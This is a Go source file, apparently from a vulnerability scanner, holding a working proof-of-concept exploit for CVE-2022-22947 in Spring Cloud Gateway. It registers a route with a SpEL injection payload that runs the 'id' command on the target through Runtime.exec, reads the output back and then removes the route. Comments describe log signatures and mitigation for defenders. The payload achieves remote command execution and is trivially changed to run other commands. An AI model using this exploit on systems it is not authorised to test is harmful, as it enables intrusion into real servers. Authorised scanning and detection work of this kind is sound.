package poc

import (
	"fmt"
	"github.com/fatih/color"
	"ssp/common"
	"strings"
)

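// CVE_2022_22947 actively checks a Spring Cloud Gateway instance for
// CVE-2022-22947 (SpEL injection through the gateway actuator API).
//
// The check changes state on the target. It registers a temporary route named
// "hacktest" whose AddResponseHeader filter argument is a SpEL expression,
// asks the gateway to refresh its routes, and reads the route definition back.
// The target is reported as vulnerable when that response contains "uid=",
// "gid=" and "groups=", i.e. the output of the `id` command.
//
// Once the route has been submitted, the temporary route is always deleted and
// the routes refreshed again before returning, whatever the outcome, so that
// the check leaves no route behind on the target.
//
// For defenders: this check appears in logs as a POST to
// actuator/gateway/routes/<id> carrying a "#{...}" expression in a filter
// argument, followed by a POST to actuator/gateway/refresh. Restricting or
// disabling the gateway actuator endpoint removes the exposed surface.
//
// url is the target base URL (with or without a trailing slash). proxyURL is
// passed unchanged to common.MakeRequest.
func CVE_2022_22947(url string, proxyURL string) {
	const (
		routeEndpoint   = "actuator/gateway/routes/hacktest"
		refreshEndpoint = "actuator/gateway/refresh"
	)

	// Accept the base URL with or without a trailing slash; plain concatenation
	// would otherwise produce "http://hostactuator/..." for a bare host.
	base := strings.TrimRight(url, "/") + "/"
	routeURL := base + routeEndpoint
	refreshURL := base + refreshEndpoint

	jsonHeaders := map[string]string{
		"Accept-Encoding": "gzip, deflate",
		"Accept":          "*/*",
		"Accept-Language": "en",
		"User-Agent":      common.GetRandomUserAgent(),
		"Content-Type":    "application/json",
	}
	formHeaders := map[string]string{
		"User-Agent":   common.GetRandomUserAgent(),
		"Content-Type": "application/x-www-form-urlencoded",
	}

	payload := `{
		"id": "hacktest",
		"filters": [{
			"name": "AddResponseHeader",
			"args": {"name": "Result", "value": "#{new java.lang.String(T(org.springframework.util.StreamUtils).copyToByteArray(T(java.lang.Runtime).getRuntime().exec(new String[]{\"id\"}).getInputStream()))}"}
		}],
		"uri": "http://example.com",
		"order": 0
	}`

	// Step 1: submit the temporary route definition.
	if _, _, err := common.MakeRequest(routeURL, "POST", proxyURL, jsonHeaders, payload); err != nil {
		color.Yellow("[-] %s 请求失败，跳过漏洞检查\n", url)
		return
	}

	// From here on the route may exist on the target, so remove it on every
	// exit path (refresh failure, read-back failure, negative result), not only
	// after a confirmed finding. A failed cleanup is reported so the operator
	// can remove the route by hand.
	defer func() {
		if _, _, err := common.MakeRequest(routeURL, "DELETE", proxyURL, formHeaders, ""); err != nil {
			color.Yellow("[-] %s cleanup failed, route \"hacktest\" may still be registered: %v\n", url, err)
			return
		}
		if _, _, err := common.MakeRequest(refreshURL, "POST", proxyURL, formHeaders, ""); err != nil {
			color.Yellow("[-] %s cleanup refresh failed, route \"hacktest\" may still be active: %v\n", url, err)
		}
	}()

	// Step 2: ask the gateway to reload its routes so the new one is applied.
	if _, _, err := common.MakeRequest(refreshURL, "POST", proxyURL, formHeaders, ""); err != nil {
		color.Yellow("[-] %s 请求失败，跳过漏洞检查\n", url)
		return
	}

	// Step 3: read the route back; on a vulnerable gateway the filter argument
	// comes back with the expression already evaluated.
	// NOTE(review): the first return value of MakeRequest is ignored throughout;
	// if it carries the HTTP status, checking it would avoid probing further
	// after a 4xx/5xx on step 1 — confirm against common.MakeRequest.
	_, rawBody, err := common.MakeRequest(routeURL, "GET", proxyURL, formHeaders, "")
	if err != nil {
		fmt.Println("Error creating GET request:", err)
		return
	}

	body := string(rawBody)
	if !strings.Contains(body, "uid=") || !strings.Contains(body, "gid=") || !strings.Contains(body, "groups=") {
		color.Yellow("[-] %s 未发现CVE-2022-22947远程命令执行漏洞\n", url)
		return
	}

	common.PrintVulnerabilityConfirmation("CVE-2022-22947", url, "Null", "3")
	// NOTE(review): plain increment of a package-level counter; confirm that
	// checks are not run concurrently, or guard it.
	common.Vulnum++
}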
